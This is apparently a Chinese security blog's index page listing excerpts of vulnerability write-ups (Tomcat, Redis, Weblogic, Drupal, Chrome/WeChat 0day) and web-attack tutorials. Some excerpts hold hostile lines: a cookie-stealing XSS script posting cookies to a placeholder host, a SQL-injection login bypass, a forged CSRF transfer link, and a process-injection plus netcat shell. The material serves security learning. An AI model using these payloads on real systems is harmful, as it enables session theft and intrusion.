- 博客(86)
- 资源 (5)
- 收藏
- 关注
RSS订阅
原创 微信 0day漏洞复现
目录漏洞简介影响版本CS安装漏洞复现修复建议漏洞简介由于微信采用的是google内核,前些日子google爆出0day远程代码执行漏洞,但是需要关闭沙箱,而微信采用的是老版本google内核,默认关闭沙箱,因此只要微信用户点击恶意连接,可直接获取该PC电脑权限影响版本<=3.2.1.141(Windows系统)CS安装下载地址链接:https://pan.baidu.com/s/19En7Pkz7HIeey82PUvEBwQ 提取码:fczw 在ka...
2021-04-19 22:10:38
13943
原创 Apache Tomcat漏洞总结
CVE-2017-12615 任意写文件漏洞漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件然Tomcat对文件后缀有一定检测(不能直接写jsp),但我们使用一些文件系统的特性(如Linux下可用`/`)来绕过了限制。AJP 文件包含漏洞(CVE-2020-1938)由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文.
2021-04-17 11:48:20
20455
3
原创 Apache Solr 漏洞总结
Apache Solr简介Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。Solr是一个独立的企业级搜索应用服务器,很多企业运用solr开源服务。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。它的主要特性包括:高效、灵活的缓存功能,垂直搜索功能,高亮显示搜索结果,通过索引复制来提高可用性,提 供一套强大Data Schema来定义字段,类型和设置文本分析,提供基于Web的管理界面等。环境搭建..
2021-04-15 10:54:48
1773
原创 Google 0day远程命令执行漏洞复现
目录漏洞介绍影响版本漏洞复现解决方案漏洞介绍国外安全研究员发布了 Google Chrome 浏览器远程代码执行 0Day 漏洞的 PoC,攻击者可以利用漏洞构造特制的页面,用户访问该页面会造成远程代码执行,漏洞影响 Chrome 最新正式版(89.0.4389.114)以及所有低版本。影响版本< = 89.0.4389.114漏洞复现1.使用对应版本的google浏览器,一定要用64位的特定版本。否则无法弹出计算器。版本号:88.0.43.
2021-04-15 00:13:50
647
原创 Redis数据库漏洞总结
Redis简介Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。是非关系型数据库Redis基本常识Redis默认开放端口为6379端口,其配置文件位置为 /etc/redis/redis.conf ,Redis默认是不需要账号密码的,因此Redis的未授权漏洞一直很火。Redis常用命令set xl 123 ...
2021-04-13 22:48:14
1141
1
原创 IIS 漏洞总结
目录IIS介绍IIS6.0 版本目录解析漏洞文件名解析漏洞远程代码执行漏洞 cve_2017_7269漏洞描述POC 说明漏洞利用IIS7.5版本IIS解析漏洞漏洞原理实验环境搭建漏洞复现IIS介绍iis是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务IIS6.0 版本目录解析漏洞对于名字为.asp后缀的文...
2021-04-11 09:26:55
3949
原创 命令执行漏洞介绍及利用
命令执行漏洞原理web应用程序接受用户输入,拼接到要执行的系统命令中执行产生原理:1.用户输入未过滤或净化2.拼接到系统命令中执行
2020-06-12 14:02:53
5080
原创 XXE漏洞介绍及利用
XXE漏洞介绍XXE全称为XML External Entity Injection即XMl外部实体注入漏洞。XXE漏洞XXE漏洞触发点往往是可以上传xmlwenjian的位置,没有对xml文件进行过滤,导致可加载恶意外部文件和代码,造成任意文件读取,命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害XML介绍及用途XMl被设计用来传输和存储数据。XML文档形成了一种树状结构,它从"根部"开始,然后扩展到"枝叶"。XMl允许作者定义自己的标签和自己的文档结构。XML.
2020-06-11 16:54:25
9880
原创 SSRF漏洞介绍及利用
SSRF简介SSRF(server-site request forey,服务器请求伪造)是一种构造请求,由服务器发起请求的安全漏洞。一般的情况下,SSRF的目标就是与外部隔离的内网资源SSRF漏洞原理服务器提供了从其他服务器获取数据的功能,但没有对内网目标地址做过滤与限制。SSRF漏洞的验证方法1.因为SSRF漏洞是让服务器发送请求的安全漏洞,所以我们可以通过抓包分析发送的请求是否是由服务器发送的,从而判断是否存在SSRF漏洞2.在页面源码中查找访问的资源地址,如果该资源地址类
2020-06-11 14:26:27
8874
原创 文件上传漏洞利用介绍
绕过js验证js验证代码分析burpsuit剔除js验证对于js前端验证,直接删除js代码之后就可以绕过js验证绕过MIME-TYPE验证验证MEMI-TYPE代码分析查看源代码分析,使用$_FILE["upload_file"]["type"]获取上传文件的MIME-TYPE类型。其中upload_file是在表单中定义的。burpsuit绕过MIME-TYPE验证利用burpsuit工具截断http请求,在repeater重放修改MIME-TYPE类型绕过验证
2020-06-05 16:56:58
11220
原创 CSRF漏洞利用介绍
CSRF漏洞介绍CSRF:跨站请求伪造,也称为One Click Attack 缩写为CSRFCSRF漏洞代码分析<?php//会话验证$user =$_GET["user"];$money=$_GET["monkey"];//转账操作?>http://1270.0.1/pay.php?user=heike&monkey=10000我们把这个链接发给受害人,受害人点击后,就会把受害人的钱发给我们。CSRF自动化探测...
2020-06-02 18:35:22
14281
原创 XSS漏洞介绍及绕过技术
跨站脚本攻击(Cross Site Scriptong),为了不和层叠样式表(Cascading Style Sheels)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面插入恶意Script代码,当用户浏览该页时,嵌入期中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。反射型XSS存储型XSS DOM型XSSxss盗取cookie代码<script>document.location=http://ip/cookie.php?coo..
2020-05-30 13:22:31
14810
原创 SQL注入原理及绕过技术
sql注入产生的原因程序开发过程中,由于不重视书写规范,对sql关键字未进行过滤,导致客户端可以通过POST或GET提交sql语句到服务器端正常运行万能密码介绍select * from tables where username = ' ' and password = ' '' and '1' ='1' or '1' = '1sql注入验证单引号 ' and 1 = 1 and 1 = 2如果页面中mysql报错,证明该页面存在sql 注入漏洞mysql 5....
2020-05-29 07:19:51
15020
原创 安恒信息-明御安全网关 命令执行漏洞分析
安恒信息-明御安全网关存在命令执行漏洞,导致攻击者可以直接执行系统命令,从而控制目标系统。漏洞位置:/usr/local/webui/webui/modules/aaa/portal_auth.mds
2022-12-13 14:58:32
4256
1
原创 frp工具使用教程
frp是一个可用于内网穿透的高性能的反向代理应用,支持tcp、udp、http、https协议。frp分为客户端frpc和服务器端frps,客户端用于内网主机,服务器端用于公网服务器。
2022-09-23 16:39:01
6646
原创 任意文件下载(读取)
漏洞简介:一些网站由于业务需求,往往需要提供文件查看或下载功能。一般来说在文件下载或查看功能处,当文件名参数可控,且系统未对参数进行严格过滤或者过滤不严格时,就能够实现下载服务器上的任何文件,产生任意文件下载漏洞,黑客可以利用( ../ )跳出程序本身的限制目录实现下载任意文件。...
2022-08-29 10:57:47
4437
原创 Kerberos认证
Kerberos 是一种网络认证协议,其流程主要分为三个部分,Authentication Service Exchange,Ticket Granting Service Exchange,Client/Server Exchange
2022-08-10 16:01:59
4756
原创 Apache log4j漏洞总结
Apache log4j漏洞总结包括CVE-2017-5645(Log4j反序列化漏洞)和CVE-2021-44228(Log4j 2远程代码执行漏洞)
2022-08-02 14:13:06
3157
原创 Apache shiro 漏洞总结
Apache shiro 漏洞总结Apache shiro是一个强大灵活的开源安全框架,可以完全处理身份验证、授权、密码和会话管理。
2022-08-01 14:24:20
4462
原创 Windows进程注入提权
通过进程注入不会创建新的进程,隐蔽性比较高,可以通过"pinjector"工具实现进程注入工具使用方法pinjector.exe -l 查看可利用的进程 pinjector.exe -p pid cmd port 对pid进程执行注入,并建立侦听端口pinjector.exe -p 428 cmd 4444nc -nv 192.168.31.132 4444获得system权限的shell。...
2021-05-12 21:38:22
1371
原创 CVE-2019-15107 Webmin 远程命令执行漏洞
漏洞介绍Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。影响版本Webmin<=1.920
2021-04-21 21:44:36
481
1
原创 Joomla 漏洞总结
CVE-2015-8562 反序列化漏洞影响版本Joomla 3.4.5CVE-2017-8917 SQL注入漏洞影响版本Joomla 3.7.0
2021-04-17 20:49:01
7984
原创 Nginx解析漏洞
目录漏洞简介复现环境漏洞复现产生原因修复方法漏洞简介 对于任意文件名,在后面加上’/*.php’,该文件就会以php格式进行解析,是用户配置不当造成的复现环境 phpstudy2018 nginx+php漏洞复现1.我们在网站根目录新建2.jpg,里面写入’<?php phpinfo(); ?>’,正常显示为图片2.如果在后面加上’/x.php’,则会显示phpinfo内容产生原因对于低版本的ph...
2021-04-14 08:39:42
302
原创 CVE-2018-7600 Drupal 远程代码执行漏洞
漏洞介绍Drupal 是一款用量庞大的CMS,在Form API中存在一处远程代码执行漏洞。影响版本Drupal 6.x Drupal 7.x Drupal 8.x环境搭建1.切换到drupal相关目录下,部署docker环境cd/root/vulhub/weblogic/CVE-2018-7600docker-compose builddocker-compose up -d2.查看docker服务器情况dock ps -a3.环境启动后,访问`htt..
2021-04-07 22:00:11
744
原创 CVE-2014-3704 Drupal SQL注入漏洞
目录漏洞介绍影响版本环境搭建漏洞复现漏洞介绍Drupal 是一款用量庞大的CMS,其中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码影响版本7.0-7.31环境搭建1.切换到drupal相关目录下,部署docker环境cd/root/vulhub/weblogic/CVE-2014-3704docker-compose builddocker-compose up -d2...
2021-04-07 21:31:59
3450
1
原创 CVE-2018-2894 Weblogic 任意文件上传漏洞
目录漏洞介绍影响版本环境搭建漏洞复现漏洞介绍Web Service Test Page 在“生产模式”下默认不开启,所以该漏洞有一定限制。利用该漏洞,可以上传任意jsp文件,进而获取服务器权限。影响版本10.3.6.0 12.1.3.0 12.2.1.2 12.2.1.3环境搭建1.切换到weblogic相关目录下,部署docker环境cd/root/vulhub/weblogic/CVE-2018-2894docker-co...
2021-04-07 08:22:51
396
原创 CVE-2017-10271 weblogic XMLDecoder 反序列化漏洞
漏洞介绍Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。影响版本10.3.6.0.0 12.1.3.0.0 12.2.1.1.0 12.2.1.2.0环境搭建1.切换到weblogic相关目录下,部署docker环境cd/root/vulhub/weblogic/CVE-2017-10271docker-compose buil...
2021-04-06 21:13:33
267
原创 UDP协议分析
目录UDP简介协议特点首部格式抓包分析UDP简介UDP(用户数据报协议,User Data Protocol)是一个简单的面向数据报的运输层协议。提供的是非面向连接的、不可靠的数据流传输。协议特点UDP是面向无连接的 UDP使用尽最大努力交付 UDP是面向报文的 UDP没有拥塞控制 UDP支持一对一、一对多、多对一、多对多的交互通信 UDP首部开销小,只有8字节首部格式Source Port:源端口号,16位Destination Port:...
2021-01-02 21:19:58
484
原创 CVE-2018-12613| phpmyadmin远程文件包含漏洞
影响范围phpMyadmin 4.8.0phpMyadmin 4.8.1原打开index.php文件 分析50-63行代码$target_blacklist = array ( 'import.php', 'export.php');// If we have a valid target, let's load that script insteadif (! empty($_REQUEST['target']) && is_string($...
2020-12-09 09:20:58
398
原创 Apache多后缀名解析漏洞
目录漏洞介绍实验环境环境配置漏洞复现漏洞介绍Apache默认一个文件可以拥有多个扩展名。判断文件后缀名的规则是从右往左开始判断的,如果后缀名为不可解析的后缀名,就会从左往右判断。实验环境phpstudy环境配置打开Apache httpd.conf配置文件,添加一下代码:AddType application/x-httpd-php .php漏洞复现在WWW目录下创建1.php.a文件,其文件内容为"<?php phpinfo(); ?> ".
2020-12-04 22:55:23
924
原创 CVE-2020-14882 WebLogic远程代码执行漏洞
目录简介实验环境实验环境部署漏洞复现POC代码简介Weblogic Server是美国Oracle公司主要的产品之一,其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场主要的Java应用服务器软件之一。利用该漏洞,远程攻击者可以通过发送恶意的HTTP GET请求。成功利用此漏洞的攻击者可以在未经身份验证的情况下控制 WebLogic Server COnsole,并执行任意代码。实验环境vulhubweblogic12.2.
2020-12-03 22:22:26
1419
1
原创 12306全自动抢票
from selenium import webdriverfrom selenium.webdriver.support.ui import WebDriverWaitfrom selenium.webdriver.common.by import Byfrom selenium.webdriver.chrome.options import Optionsfrom selenium.webdriver.support import expected_conditions as ECfrom .
2020-11-26 20:05:06
568
1
原创 Wordpress Plugin Olimometer 2.56-SQL Injection
WordPress是一个使用php语言开发的博客平台,用户可以在php和MySQL数据库的服务器上架设属于自己的网站。它拥有世界上最强大的插件和模板,这也是WordPress流行的一个特点。本次漏洞就产生在一个插件上:Olimometer。Olimometer是一个完全可定制的筹款温度计,可以显示当前进度的进度条,他可以自定义皮肤和多种不同的样式,而插件目录一般安装在wp_content\plugins下漏洞介绍:Olimometer插件<=2.56版本中存在SQL注入,恶意访问者可以通过
2020-11-25 20:53:35
259
原创 CVE-2016-8655 Linux内核提权漏洞
漏洞介绍此漏洞可用于未授权进程中执行内核代码,恶意访问者只需要本地普通权限,就可以利用该漏洞提升到管理员权限。影响范围Linux内核实验环境操作机:Ubuntu 15.10(内核版本4.2.0)使用POC验证漏洞1. 运行 uname-a 查看系统内核版本2.查看当前用户权限id3.执行脚本cd /test./CVE-2016-86554.再次查看当前用户权限id到这里就成功的验证了这个漏洞。...
2020-11-18 22:30:36
957
1
原创 Python-base64介绍
介绍base64模块是用来做base64编码解码,常用于小型数据传输。编码后的数据是一个字符串,包括a-z,A-Z,/,+共64个字符,ji'ke'yong
2020-10-28 21:39:39
12414
原创 selemiun模块介绍
简介selenium最初是一个测试工具,而在爬虫中主要是为了解决requests无法直接执行JavaScript代码的问题selenium本质是通过驱动浏览器,完全模拟浏览器的操作,比如:跳转,点击,切换页面等。安装 selenium+chromedriver安装selenium:pip3 install seleniumchromedriver:下载地址一定要安装与浏览器版本相对应的chromedriver版本
2020-10-22 23:13:44
766
原创 ARP协议
目录ARP协议简介ARP数据包的封装ARP协议简介ARP是Address Resolution Protocol(地址解析协议)的缩写。在以太网中,两台主机想要通信,就必须要知道目标主机的MAC地址。ARP协议的基本功能是在主机发送数据之前将目标IP转换为MAC地址,完成网络地址到物理地址的映射,以保证两台主机能够正常通信。ARP数据包的封装英文 中文 中文说明 Hardware type 硬件类型 用来定义运行ARP的网络类型。每个局域网基.
2020-09-19 14:33:10
561
原创 HTTP协议分析
目录HTTP简介HTTP三点注意事项:HTTP消息结构客户端请求信息http响应消息HTTP请求方法HTTP请求头信息HTTP响应头信息常用HTTP状态码实例演示客户端请求:服务器响应:HTTP认证Basic基本认证简介基本认证步骤缺点HTTP简介HTTP协议Hyper Text Transfer Protocol(超文本传输协议)的缩写。HTTPS(Hypertext Transfer Protocol over Secur.
2020-09-18 21:09:52
457
原创 TCP协议分析
目录TCP简介TCP首部格式建立连接结束连接为什么建立连接是三次而断开连接是四次呢?TCP和UDP的区别1.连接方面区别2.安全方面3.传输效率的区别4.连接对象数量的区别5.数据包区别TCP简介TCP(Transmission Control Protocol)是一种面向连接的、可靠的、基于字节流的传输层通信协议。我们所熟悉的FTP,SSH,HTTP,HTTPS,SMTP,POP3等都是使用TCP协议。TCP最重要的一个特点就是面向连接的协议,.
2020-09-17 20:23:11
1057
cve_2017_7269.rb
2021-04-11
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人